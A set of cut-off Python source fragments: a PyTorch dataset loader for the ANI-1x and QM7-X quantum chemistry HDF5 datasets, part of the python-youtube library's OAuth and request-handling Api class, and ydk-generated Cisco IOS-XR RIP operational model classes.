'wb97x_tz.mbis_quadrupoles','wb97x_tz.mbis_octupoles',
'wb97x_tz.mbis_volumes']:
out = np.reshape(self.datadic[i][f][ci], -1).astype(dtype)
if self.pad:
out = np.pad(out, (0, (self.pad - out.shape[0])))
#(Nc, Na, 3)
elif f in ['coordinates','wb97x_dz.forces','wb97x_dz.forces']:
out = np.reshape(self.datadic[i][f][ci], -1).astype(dtype)
if self.pad:
out = np.pad(out, (0, (self.pad*3 - out.shape[0])))
#(Nc, 6), (Nc, 3), (Nc)
else:
out = np.reshape(self.datadic[i][f][ci], -1).astype(dtype)
data.append(out)
if len(data) == 0:
return data
else:
return np.concatenate(data)
x_cat = []
if 'atomic_numbers' in self.features:
x_cat.append(as_tensor(get_features(['atomic_numbers'], 'int64')))
x_con = get_features(self.features, 'float32', exclude_cat=True)
targets = get_features(self.targets, 'float64')
return as_tensor(x_con), x_cat, as_tensor(targets)
def __len__(self):
return len(self.ds_idx)
def load_data(self, features, target, in_file):
"""data_keys = ['wb97x_dz.energy','<KEY>']
# Original ANI-1x data (https://doi.org/10.1063/1.5023802)
data_keys = ['<KEY>','<KEY>']
# CHNO portion of the data set used in AIM-Net (https://doi.org/10.1126/sciadv.aav6490)
data_keys = ['ccsd(t)_cbs.energy']
# The coupled cluster ANI-1ccx data set (https://doi.org/10.1038/s41467-019-10827-4)
data_keys = ['<KEY>']
# A subset of this data was used for training the ACA charge model
(https://doi.org/10.1021/acs.jpclett.8b01939)
ragged dataset each mol has all keys and nan for missing values
throws out the mol if any of the feature values or criterion feature values are missing
"""
attributes = features+target
if self.criterion != None and self.criterion not in attributes:
attributes.append(self.criterion)
datadic = {}
with h5py.File(in_file, 'r') as f:
for mol in f.keys():
nan = False
while not nan: # if empty values break out and del mol
data = {}
for attr in attributes:
if np.isnan(f[mol][attr][()]).any():
nan = True
else:
data[attr] = f[mol][attr][()]
datadic[mol] = data
break
if nan:
try: del datadic[mol]
except: pass
return datadic
def get_conformation_index(self, mol):
"""each molecular formula (mol) may have many different isomers
select the conformation based on some criterion (attribute value)
"""
if self.criterion == None:
criterion = self.targets[0]
else:
criterion = self.criterion
ci = 0
if isinstance(self.conformation, int):
ci = self.conformation
elif self.conformation == 'random':
ci = random.randrange(mol[criterion].shape[0])
elif self.conformation == 'max':
ci = np.argmax(mol[criterion], axis=0)
elif self.conformation == 'min':
ci = np.argmin(mol[criterion], axis=0)
return ci
class QM7X(QDataset):
"""QM7-X: A comprehensive dataset of quantum-mechanical properties spanning
the chemical space of small organic molecules
https://arxiv.org/abs/2006.15139
https://zenodo.org/record/3905361
decompress the .xz files in ./QM7X/
tar xvf *000.xz
1000.hdf5 6.5 GB
2000.hdf5 8.8 GB
3000.hdf5 16.9 GB
4000.hdf5 12.4 GB
5000.hdf5 9.8 GB
6000.hdf5 17.2 GB
7000.hdf5 9.8 GB
8000.hdf5 0.8 GB
A description of the structure generation procedure is available in the paper
related to this dataset. Each HDF5 file contains information about the molecular
properties of equilibrium and non-equilibrium conformations of small molecules
composed of up to seven heavy atoms (C, N, O, S, Cl). For instance, you can access
to the information saved in the 1000.hdf5 file as,
fDFT = h5py.File('1000.hdf5', 'r')
fDFT[idmol]: idmol, ID number of molecule (e.g., '1', '100', '94')
fDFT[idmol][idconf]: idconf, ID configuration (e.g., 'Geom-m1-i1-c1-opt', 'Geom-m1-i1-c1-50')
The idconf label has the general form "Geom-mr-is-ct-u", were r enumerated the
SMILES strings, s the stereoisomers excluding conformers, t the considered
(meta)stable conformers, and u the optimized/displaced structures; u = opt
indicates the DFTB3+MBD optimized structures and u = 1,...,100 enumerates
the displaced non-equilibrium structures. Note that these indices are not
sorted according to their PBE0+MBD relative energies.
Then, for each structure (i.e., idconf), you will find the following properties:
-'atNUM': Atomic numbers (N)
-'atXYZ': Atoms coordinates [Ang] (Nx3)
-'sRMSD': RMSD to optimized structure [Ang] (1)
-'sMIT': Momente of inertia tensor [amu.Ang^2] (9)
-'ePBE0+MBD': Total PBE0+MBD energy [eV] (1)
-'eDFTB+MBD': Total DFTB+MBD energy [eV] (1)
-'eAT': PBE0 atomization energy [eV] (1)
-'ePBE0': PBE0 energy [eV] (1)
-'eMBD': MBD energy [eV] (1)
-'eTS': TS dispersion energy [eV] (1)
-'eNN': Nuclear-nuclear repulsion energy [eV] (1)
-'eKIN': Kinetic energy [eV] (1)
-'eNE': Nuclear-electron attracttion [eV] (1)
-'eEE': Classical coulomb energy (el-el) [eV] (1)
-'eXC': Exchange-correlation energy [eV] (1)
-'eX': Exchange energy [eV] (1)
-'eC': Correlation energy [eV] (1)
-'eXX': Exact exchange energy [eV] (1)
-'eKSE': Sum of Kohn-Sham eigenvalues [eV] (1)
-'KSE': Kohn-Sham eigenvalues [eV] (depends on the molecule)
-'eH': HOMO energy [eV] (1)
-'eL': LUMO energy [eV] (1)
-'HLgap': HOMO-LUMO gap [eV] (1)
-'DIP': Total dipole moment [e.Ang] (1)
-'vDIP': Dipole moment components [e.Ang] (3)
-'vTQ': Total quadrupole moment components [e.Ang^2] (3)
-'vIQ': Ionic quadrupole moment components [e.Ang^2] (3)
-'vEQ': Electronic quadrupole moment components [eAng^2] (3)
-'mC6': Molecular C6 coefficient [hartree.bohr^6] (computed using SCS) (1)
-'mPOL': Molecular polarizability [bohr^3] (computed using SCS) (1)
-'mTPOL': Molecular polarizability tensor [bohr^3] (9)
-'totFOR': Total PBE0+MBD atomic forces (unitary forces cleaned) [eV/Ang] (Nx3)
-'vdwFOR': MBD atomic forces [eV/Ang] (Nx3)
-'pbe0FOR': PBE0 atomic forces [eV/Ang] (Nx3)
-'hVOL': Hirshfeld volumes [bohr^3] (N)
-'hRAT': Hirshfeld ratios (N)
-'hCHG': Hirshfeld charges [e] (N)
-'hDIP': Hirshfeld dipole moments [e.bohr] (N)
-'hVDIP': Components of Hirshfeld dipole moments [e.bohr] (Nx3)
-'atC6': Atomic C6 coefficients [hartree.bohr^6] (N)
-'atPOL': Atomic polarizabilities [bohr^3] (N)
-'vdwR': van der Waals radii [bohr] (N)
seletor = list of regular expression strings (attr) for searching
and selecting idconf keys.
returns mols[idmol] = [idconf,idconf,...]
idconf, ID configuration (e.g., 'Geom-m1-i1-c1-opt', 'Geom-m1-i1-c1-50')
TODO: loading multiple isotopes per molecular formula
"""
set_ids = ['1000', '2000', '3000', '4000', '5000', '6000', '7000', '8000']
properties = ['DIP','HLgap','KSE','atC6','atNUM','atPOL','atXYZ','eAT',
'eC','eDFTB+MBD','eEE','eH','eKIN','eKSE','eL','eMBD','eNE',
'eNN','ePBE0','ePBE0+MBD','eTS','eX','eXC','eXX','hCHG',
'hDIP','hRAT','hVDIP','hVOL','mC6','mPOL','mTPOL','pbe0FOR',
'sMIT','sRMSD','totFOR','vDIP','vEQ','vIQ','vTQ','vdwFOR','vdwR']
def __init__(self, features=['atNUM','atXYZ'], target=['eAT'], pad=None,
in_dir='./data/qm7x/', selector=['i1-c1-opt']):
self.features, self.target, self.pad, self.in_dir = features, target, pad, in_dir
self.embed = []
self.datamap = QM7X.map_dataset(in_dir, selector)
self.ds_idx = list(self.datamap.keys())
self.load_data(in_dir)
    def __getitem__(self, i):
        """Return (features, [], target) tensors for molecule id *i*.

        When several conformations match the selector, one is chosen at
        random each time the item is fetched.
        """
        features = []
        target = []
        # select the correct h5 handle
        # NOTE(review): this maps molecule id -> set-file index, apparently
        # assuming ids are grouped in blocks of 1000 per file ('1000'..'8000');
        # confirm the edge handling for i == 1 and for exact multiples of 1000.
        if i == 1: j = 1
        else: j = i-1
        k = j // 1000
        handle = self.h5_handles[k]
        #if multiple conformations for a given formula i, one is randomly selected
        conformations = self.datamap[i]
        conformation = random.choice(conformations)
        mol = handle[str(i)][conformation]
        for f in self.features:
            features.append(np.reshape(mol[f][()], -1).astype(np.float32))
        features = np.concatenate(features)
        if self.pad:
            features = np.pad(features, (0, self.pad - len(features)))
        for t in self.target:
            target.append(np.reshape(mol[t][()], -1))
        target = np.concatenate(target)
        return as_tensor(features), [], as_tensor(target)
def __len__(self):
return len(self.ds_idx)
def load_data(self, in_dir):
| |
# <reponame>MerleLiuKun/python-youtube
"""
Main Api implementation.
"""
from typing import Optional, List, Union
import requests
from requests.auth import HTTPBasicAuth
from requests.models import Response
from requests_oauthlib.oauth2_session import OAuth2Session
from pyyoutube.error import ErrorCode, ErrorMessage, PyYouTubeException
from pyyoutube.models import (
AccessToken,
UserProfile,
ActivityListResponse,
CaptionListResponse,
ChannelListResponse,
ChannelSectionResponse,
PlaylistListResponse,
PlaylistItemListResponse,
VideoListResponse,
CommentThreadListResponse,
CommentListResponse,
VideoCategoryListResponse,
SearchListResponse,
SubscriptionListResponse,
I18nRegionListResponse,
I18nLanguageListResponse,
MemberListResponse,
MembershipsLevelListResponse,
VideoAbuseReportReasonListResponse,
)
from pyyoutube.utils.params_checker import enf_comma_separated, enf_parts
class Api(object):
"""
Example usage:
To create an instance of pyyoutube.Api class:
>>> import pyyoutube
>>> api = pyyoutube.Api(api_key="your api key")
To get one channel info:
>>> res = api.get_channel_info(channel_name="googledevelopers")
>>> print(res.items[0])
Now this api provide methods as follows:
>>> api.get_authorization_url()
>>> api.generate_access_token()
>>> api.refresh_token()
>>> api.get_channel_info()
>>> api.get_playlist_by_id()
>>> api.get_playlists()
>>> api.get_playlist_item_by_id()
>>> api.get_playlist_items()
>>> api.get_video_by_id()
>>> api.get_videos_by_chart()
>>> api.get_videos_by_myrating()
>>> api.get_comment_thread_by_id()
>>> api.get_comment_threads()
>>> api.get_comment_by_id()
>>> api.get_comments()
>>> api.get_video_categories()
>>> api.get_subscription_by_id()
>>> api.get_subscription_by_channel()
>>> api.get_subscription_by_me()
>>> api.get_activities_by_channel()
>>> api.get_activities_by_me()
>>> api.get_captions_by_video()
>>> api.get_channel_sections_by_id()
>>> api.get_channel_sections_by_channel()
>>> api.get_i18n_regions()
>>> api.get_i18n_languages()
>>> api.get_video_abuse_report_reason()
>>> api.search()
>>> api.search_by_keywords()
>>> api.search_by_developer()
>>> api.search_by_mine()
>>> api.search_by_related_video()
"""
BASE_URL = "https://www.googleapis.com/youtube/v3/"
AUTHORIZATION_URL = "https://accounts.google.com/o/oauth2/v2/auth"
EXCHANGE_ACCESS_TOKEN_URL = "https://oauth2.googleapis.com/token"
USER_INFO_URL = "https://www.googleapis.com/oauth2/v1/userinfo"
DEFAULT_REDIRECT_URI = "https://localhost/"
DEFAULT_SCOPE = [
"https://www.googleapis.com/auth/youtube",
"https://www.googleapis.com/auth/userinfo.profile",
]
DEFAULT_STATE = "PyYouTube"
DEFAULT_TIMEOUT = 10
DEFAULT_QUOTA = 10000 # this quota reset at 00:00:00(GMT-7) every day.
def __init__(
self,
client_id: Optional[str] = None,
client_secret: Optional[str] = None,
api_key: Optional[str] = None,
access_token: Optional[str] = None,
timeout: Optional[int] = None,
proxies: Optional[dict] = None,
) -> None:
"""
This Api provide two method to work. Use api key or use access token.
Args:
client_id(str, optional):
Your google app's ID.
client_secret (str, optional):
Your google app's secret.
api_key(str, optional):
The api key which you create from google api console.
access_token(str, optional):
If you not provide api key, you can do authorization to get an access token.
If all api key and access token provided. Use access token first.
timeout(int, optional):
The request timeout.
proxies(dict, optional):
If you want use proxy, need point this param.
param style like requests lib style.
Refer https://2.python-requests.org//en/latest/user/advanced/#proxies
Returns:
YouTube Api instance.
"""
self._client_id = client_id
self._client_secret = client_secret
self._api_key = api_key
self._access_token = access_token
self._refresh_token = None # This keep current user's refresh token.
self._timeout = timeout
self.session = requests.Session()
self.proxies = proxies
if not (
(self._client_id and self._client_secret)
or self._api_key
or self._access_token
):
raise PyYouTubeException(
ErrorMessage(
status_code=ErrorCode.MISSING_PARAMS,
message="Must specify either client key info or api key.",
)
)
if self._timeout is None:
self._timeout = self.DEFAULT_TIMEOUT
def _get_oauth_session(
self,
redirect_uri: Optional[str] = None,
scope: Optional[List[str]] = None,
**kwargs,
) -> OAuth2Session:
"""
Build a request session for OAuth.
Args:
redirect_uri(str, optional)
Determines how Google's authorization server sends a response to your app.
If not provide will use default https://localhost/
scope (list, optional)
The scope you want give permission.
If you not provide, will use default scope.
kwargs(dict, optional)
Some other params you want provide.
Returns:
OAuth2 Session
"""
if redirect_uri is None:
redirect_uri = self.DEFAULT_REDIRECT_URI
if scope is None:
scope = self.DEFAULT_SCOPE
return OAuth2Session(
client_id=self._client_id,
scope=scope,
redirect_uri=redirect_uri,
state=self.DEFAULT_STATE,
**kwargs,
)
def get_authorization_url(
self,
redirect_uri: Optional[str] = None,
scope: Optional[List[str]] = None,
**kwargs,
) -> (str, str):
"""
Build authorization url to do authorize.
Args:
redirect_uri(str, optional)
Determines how Google's authorization server sends a response to your app.
If not provide will use default https://localhost/
scope (list, optional)
The scope you want give permission.
If you not provide, will use default scope.
kwargs(dict, optional)
Some other params you want provide.
Returns:
The uri you can open on browser to do authorize.
"""
oauth_session = self._get_oauth_session(
redirect_uri=redirect_uri,
scope=scope,
**kwargs,
)
authorization_url, state = oauth_session.authorization_url(
self.AUTHORIZATION_URL,
access_type="offline",
prompt="select_account",
**kwargs,
)
return authorization_url, state
def generate_access_token(
self,
authorization_response: str,
redirect_uri: Optional[str] = None,
scope: Optional[List[str]] = None,
return_json: bool = False,
**kwargs,
) -> Union[dict, AccessToken]:
"""
Use the google auth response to get access token
Args:
authorization_response (str)
The response url which google redirect.
redirect_uri(str, optional)
Determines how Google's authorization server sends a response to your app.
If not provide will use default https://localhost/
scope (list, optional)
The scope you want give permission.
If you not provide, will use default scope.
return_json(bool, optional)
The return data type. If you set True JSON data will be returned.
False will return pyyoutube.AccessToken
kwargs(dict, optional)
Some other params you want provide.
Return:
Retrieved access token's info, pyyoutube.AccessToken instance.
"""
oauth_session = self._get_oauth_session(
redirect_uri=redirect_uri,
scope=scope,
**kwargs,
)
token = oauth_session.fetch_token(
self.EXCHANGE_ACCESS_TOKEN_URL,
client_secret=self._client_secret,
authorization_response=authorization_response,
proxies=self.proxies,
)
self._access_token = oauth_session.access_token
self._refresh_token = oauth_session.token["refresh_token"]
if return_json:
return token
else:
return AccessToken.from_dict(token)
def refresh_token(
    self, refresh_token: Optional[str] = None, return_json: bool = False
) -> Union[dict, AccessToken]:
    """
    Exchange a refresh token for a new access token.

    Args:
        refresh_token (str, optional):
            The refresh token which the API previously returned. Falls
            back to the token stored on this client when omitted.
        return_json (bool, optional):
            If True the raw token dict is returned instead of a
            pyyoutube.AccessToken instance.

    Returns:
        Retrieved new access token info (dict or pyyoutube.AccessToken).

    Raises:
        PyYouTubeException: If no refresh token is available.
    """
    refresh_token = refresh_token if refresh_token else self._refresh_token
    if refresh_token is None:
        raise PyYouTubeException(
            ErrorMessage(
                status_code=ErrorCode.MISSING_PARAMS,
                # Plain string literal: the original was an f-string with
                # no placeholders (ruff F541); runtime value is unchanged.
                message="Must provide the refresh token or api has been authorized.",
            )
        )
    oauth_session = OAuth2Session(client_id=self._client_id)
    auth = HTTPBasicAuth(self._client_id, self._client_secret)
    new_token = oauth_session.refresh_token(
        self.EXCHANGE_ACCESS_TOKEN_URL,
        refresh_token=refresh_token,
        auth=auth,
    )
    self._access_token = oauth_session.access_token
    if return_json:
        return new_token
    else:
        return AccessToken.from_dict(new_token)
@staticmethod
def _parse_response(response: Response) -> dict:
    """
    Decode a response body and surface API-reported errors.

    Args:
        response (Response):
            The HTTP response which the request returned.

    Returns:
        The decoded JSON payload.

    Raises:
        PyYouTubeException: If the payload carries an ``error`` field.
    """
    payload = response.json()
    if "error" not in payload:
        return payload
    raise PyYouTubeException(response)
@staticmethod
def _parse_data(data: Optional[dict]) -> Union[dict, list]:
    """
    Pull the resource items out of a decoded API payload.

    Args:
        data (dict):
            The payload produced by ``response.json()``.

    Returns:
        The ``items`` collection contained in the payload.
    """
    return data["items"]
def _request(
    self, resource, method=None, args=None, post_args=None, enforce_auth=True
) -> Response:
    """
    Main request sender.

    Args:
        resource (str):
            Which type of data to retrieve, e.g. channels, videos.
        method (str, optional):
            HTTP method for the request. Defaults to 'GET'; forced to
            'POST' whenever ``post_args`` is given.
        args (dict, optional):
            URL query parameters for the request.
        post_args (dict, optional):
            POST body parameters for the request.
        enforce_auth (bool, optional):
            Whether to attach Google credentials to the request.

    Returns:
        The raw HTTP response.

    Raises:
        PyYouTubeException: If no credentials are available while
            ``enforce_auth`` is set, or the HTTP call raises HTTPError.
    """
    if method is None:
        method = "GET"
    if args is None:
        args = {}
    if post_args is not None:
        method = "POST"

    # Prefer the user access token over the API key when both are set.
    key, credential = None, None
    if self._api_key is not None:
        key, credential = "key", self._api_key
    if self._access_token is not None:
        key, credential = "access_token", self._access_token

    if enforce_auth:
        if credential is None:
            raise PyYouTubeException(
                ErrorMessage(
                    status_code=ErrorCode.MISSING_PARAMS,
                    message="You must provide your credentials.",
                )
            )
        # Only inject the credential when the caller has not already set it.
        if method == "POST" and key not in post_args:
            post_args[key] = credential
        elif method == "GET" and key not in args:
            args[key] = credential

    try:
        response = self.session.request(
            method=method,
            url=self.BASE_URL + resource,
            timeout=self._timeout,
            params=args,
            data=post_args,
            proxies=self.proxies,
        )
    except requests.HTTPError as e:
        raise PyYouTubeException(
            ErrorMessage(status_code=ErrorCode.HTTP_ERROR, message=e.args[0])
        )
    return response
def get_profile(
    self, access_token: Optional[str] = None, return_json: Optional[bool] = False
) -> Union[dict, UserProfile]:
    """
    Get the profile info for the user the access token belongs to.

    Args:
        access_token (str, optional):
            User access token. Falls back to this client's stored access
            token when omitted.
        return_json (bool, optional):
            If True the raw JSON dict is returned.
            If False a pyyoutube.UserProfile instance is returned.

    Returns:
        The user info for the given access token.

    Raises:
        PyYouTubeException: If no access token is available, the HTTP
            call raises HTTPError, or the API reports an error.
    """
    if access_token is None:
        access_token = self._access_token
    if access_token is None:
        raise PyYouTubeException(
            ErrorMessage(
                status_code=ErrorCode.MISSING_PARAMS,
                # Plain string literal: the original was an f-string with
                # no placeholders (ruff F541); runtime value is unchanged.
                message="Must provide the access token or api has been authorized.",
            )
        )
    try:
        response = self.session.get(
            self.USER_INFO_URL,
            params={"access_token": access_token},
            timeout=self._timeout,
            proxies=self.proxies,
        )
    except requests.HTTPError as e:
        raise PyYouTubeException(
            ErrorMessage(status_code=ErrorCode.HTTP_ERROR, message=e.args[0])
        )
    data = self._parse_response(response)
    if return_json:
        return data
    else:
        return UserProfile.from_dict(data)
def paged_by_page_token(
self,
resource: str,
args: dict,
count: Optional[int] = None,
):
"""
Response paged by response's page token. If not provide response token
Args:
resource (str):
The resource string need to retrieve data.
args (dict)
The args for api.
count (int, optional):
The count for result items you want to get.
If provide this with None, will retrieve all items.
Note:
The all items maybe too much. Notice your app's cost.
Returns:
Data api origin response.
"""
res_data: Optional[dict] | |
destination_address
IP Address of this interface
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: prefix_length
Prefix length of the IP address
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: metric_cost
Cost added to routes through this interface
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: split_horizon
Split horizon enabled indicator
**type**\: bool
**config**\: False
.. attribute:: poison_horizon
Poisoned reverse enabled indicator
**type**\: bool
**config**\: False
.. attribute:: triggered_rip
Triggered RIP enabled indicator
**type**\: bool
**config**\: False
.. attribute:: neighbor_address
Interface's triggered RIP neighbor
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: oom_flags
Out\-of\-memory status flags
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: join_status
Multicast group join status
**type**\: bool
**config**\: False
.. attribute:: lpts_state
LPTSState
**type**\: bool
**config**\: False
.. attribute:: auth_mode
Authentication Mode
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: auth_keychain
Authentication Keychain Name
**type**\: str
**config**\: False
.. attribute:: send_auth_key_exists
Authentication send key exists
**type**\: bool
**config**\: False
.. attribute:: auth_key_md5
Authentication key programmed with MD5 algorithm
**type**\: bool
**config**\: False
.. attribute:: auth_key_send_id
Current active Send Authentication Key Id
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
.. attribute:: total_pkt_recvd
Total packets received
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: pkt_drop_wrong_kc
Packets dropped due to wrong keychain configured
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: pkt_drop_no_auth
Packets dropped due to missing authentication data
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: pkt_drop_invalid_auth
Packets dropped due to invalid authentication data
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: pkt_accepted_valid_auth
Packets accepted with valid authentication data
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: rip_summary
User defined summary addresses
**type**\: list of :py:class:`RipSummary <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_rip_oper.Rip.DefaultVrf.Interfaces.Interface.RipSummary>`
**config**\: False
.. attribute:: rip_peer
Neighbors on this interface
**type**\: list of :py:class:`RipPeer <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_rip_oper.Rip.DefaultVrf.Interfaces.Interface.RipPeer>`
**config**\: False
"""
_prefix = 'ip-rip-oper'
_revision = '2015-11-09'
def __init__(self):
    """Initialize the generated 'interface' list-entry entity: YANG identity, child containers, leaf descriptors, and path lambdas."""
    # ydk-gen emits code for both py2 and py3; pick the matching super() form.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(Rip.DefaultVrf.Interfaces.Interface, self).__init__()
    # Identity of this node within the YANG schema tree.
    self.yang_name = "interface"
    self.yang_parent_name = "interfaces"
    self.is_top_level_class = False
    self.has_list_ancestor = False
    # This entity is a keyed YANG list entry; its key leaf is interface-name.
    self.ylist_key_names = ['interface_name']
    # Child list classes reachable under this node.
    self._child_classes = OrderedDict([("rip-summary", ("rip_summary", Rip.DefaultVrf.Interfaces.Interface.RipSummary)), ("rip-peer", ("rip_peer", Rip.DefaultVrf.Interfaces.Interface.RipPeer))])
    # Leaf map: python attribute -> (YLeaf descriptor, accepted python types).
    self._leafs = OrderedDict([
        ('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
        ('interface', (YLeaf(YType.str, 'interface'), ['str'])),
        ('if_handle', (YLeaf(YType.str, 'if-handle'), ['str'])),
        ('rip_enabled', (YLeaf(YType.boolean, 'rip-enabled'), ['bool'])),
        ('is_passive_interface', (YLeaf(YType.boolean, 'is-passive-interface'), ['bool'])),
        ('multicast_address', (YLeaf(YType.boolean, 'multicast-address'), ['bool'])),
        ('accept_metric', (YLeaf(YType.boolean, 'accept-metric'), ['bool'])),
        ('send_version', (YLeaf(YType.uint32, 'send-version'), ['int'])),
        ('receive_version', (YLeaf(YType.uint32, 'receive-version'), ['int'])),
        ('state', (YLeaf(YType.enumeration, 'state'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_rip_oper', 'InterfaceState', '')])),
        ('destination_address', (YLeaf(YType.str, 'destination-address'), ['str'])),
        ('prefix_length', (YLeaf(YType.uint32, 'prefix-length'), ['int'])),
        ('metric_cost', (YLeaf(YType.uint32, 'metric-cost'), ['int'])),
        ('split_horizon', (YLeaf(YType.boolean, 'split-horizon'), ['bool'])),
        ('poison_horizon', (YLeaf(YType.boolean, 'poison-horizon'), ['bool'])),
        ('triggered_rip', (YLeaf(YType.boolean, 'triggered-rip'), ['bool'])),
        ('neighbor_address', (YLeaf(YType.str, 'neighbor-address'), ['str'])),
        ('oom_flags', (YLeaf(YType.uint32, 'oom-flags'), ['int'])),
        ('join_status', (YLeaf(YType.boolean, 'join-status'), ['bool'])),
        ('lpts_state', (YLeaf(YType.boolean, 'lpts-state'), ['bool'])),
        ('auth_mode', (YLeaf(YType.uint32, 'auth-mode'), ['int'])),
        ('auth_keychain', (YLeaf(YType.str, 'auth-keychain'), ['str'])),
        ('send_auth_key_exists', (YLeaf(YType.boolean, 'send-auth-key-exists'), ['bool'])),
        ('auth_key_md5', (YLeaf(YType.boolean, 'auth-key-md5'), ['bool'])),
        ('auth_key_send_id', (YLeaf(YType.uint64, 'auth-key-send-id'), ['int'])),
        ('total_pkt_recvd', (YLeaf(YType.uint32, 'total-pkt-recvd'), ['int'])),
        ('pkt_drop_wrong_kc', (YLeaf(YType.uint32, 'pkt-drop-wrong-kc'), ['int'])),
        ('pkt_drop_no_auth', (YLeaf(YType.uint32, 'pkt-drop-no-auth'), ['int'])),
        ('pkt_drop_invalid_auth', (YLeaf(YType.uint32, 'pkt-drop-invalid-auth'), ['int'])),
        ('pkt_accepted_valid_auth', (YLeaf(YType.uint32, 'pkt-accepted-valid-auth'), ['int'])),
    ])
    # Leaf values default to None (unset) until populated from the device.
    self.interface_name = None
    self.interface = None
    self.if_handle = None
    self.rip_enabled = None
    self.is_passive_interface = None
    self.multicast_address = None
    self.accept_metric = None
    self.send_version = None
    self.receive_version = None
    self.state = None
    self.destination_address = None
    self.prefix_length = None
    self.metric_cost = None
    self.split_horizon = None
    self.poison_horizon = None
    self.triggered_rip = None
    self.neighbor_address = None
    self.oom_flags = None
    self.join_status = None
    self.lpts_state = None
    self.auth_mode = None
    self.auth_keychain = None
    self.send_auth_key_exists = None
    self.auth_key_md5 = None
    self.auth_key_send_id = None
    self.total_pkt_recvd = None
    self.pkt_drop_wrong_kc = None
    self.pkt_drop_no_auth = None
    self.pkt_drop_invalid_auth = None
    self.pkt_accepted_valid_auth = None
    # Child lists start empty; entries are appended as data is read.
    self.rip_summary = YList(self)
    self.rip_peer = YList(self)
    # Segment path embeds the list key; the absolute path anchors it under the top-level rip node.
    self._segment_path = lambda: "interface" + "[interface-name='" + str(self.interface_name) + "']"
    self._absolute_path = lambda: "Cisco-IOS-XR-ip-rip-oper:rip/default-vrf/interfaces/%s" % self._segment_path()
    # Freeze the entity: later attribute writes go through _perform_setattr validation.
    self._is_frozen = True
def __setattr__(self, name, value):
    """Route attribute writes through ydk's validation for this frozen entity."""
    self._perform_setattr(Rip.DefaultVrf.Interfaces.Interface, ['interface_name', 'interface', 'if_handle', 'rip_enabled', 'is_passive_interface', 'multicast_address', 'accept_metric', 'send_version', 'receive_version', 'state', 'destination_address', 'prefix_length', 'metric_cost', 'split_horizon', 'poison_horizon', 'triggered_rip', 'neighbor_address', 'oom_flags', 'join_status', 'lpts_state', 'auth_mode', 'auth_keychain', 'send_auth_key_exists', 'auth_key_md5', 'auth_key_send_id', 'total_pkt_recvd', 'pkt_drop_wrong_kc', 'pkt_drop_no_auth', 'pkt_drop_invalid_auth', 'pkt_accepted_valid_auth'], name, value)
class RipSummary(_Entity_):
    """
    User defined summary addresses
    .. attribute:: prefix
        Summary address prefix
        **type**\: str
        **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
        **config**\: False
    .. attribute:: prefix_length
        Summary address prefix length
        **type**\: int
        **range:** 0..4294967295
        **config**\: False
    .. attribute:: next_hop_address
        Summary address next hop
        **type**\: str
        **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
        **config**\: False
    .. attribute:: metric
        Summary metric
        **type**\: int
        **range:** \-2147483648..2147483647
        **config**\: False
    """
    # YANG module prefix and revision this generated class was built from.
    _prefix = 'ip-rip-oper'
    _revision = '2015-11-09'
    def __init__(self):
        """Initialize the 'rip-summary' entity: YANG identity, leaf descriptors, and segment path."""
        # ydk-gen emits code for both py2 and py3; pick the matching super() form.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Rip.DefaultVrf.Interfaces.Interface.RipSummary, self).__init__()
        self.yang_name = "rip-summary"
        self.yang_parent_name = "interface"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Leaf map: python attribute -> (YLeaf descriptor, accepted python types).
        self._leafs = OrderedDict([
            ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
            ('prefix_length', (YLeaf(YType.uint32, 'prefix-length'), ['int'])),
            ('next_hop_address', (YLeaf(YType.str, 'next-hop-address'), ['str'])),
            ('metric', (YLeaf(YType.int32, 'metric'), ['int'])),
        ])
        # Leaf values default to None (unset) until populated from the device.
        self.prefix = None
        self.prefix_length = None
        self.next_hop_address = None
        self.metric = None
        self._segment_path = lambda: "rip-summary"
        # Freeze the entity: later attribute writes go through _perform_setattr validation.
        self._is_frozen = True
    def __setattr__(self, name, value):
        """Route attribute writes through ydk's validation for this frozen entity."""
        self._perform_setattr(Rip.DefaultVrf.Interfaces.Interface.RipSummary, ['prefix', 'prefix_length', 'next_hop_address', 'metric'], name, value)
    @staticmethod
    def _meta_info():
        # Local import: the meta table lives in the generated _meta package.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ip_rip_oper as meta
        return meta._meta_table['Rip.DefaultVrf.Interfaces.Interface.RipSummary']['meta_info']
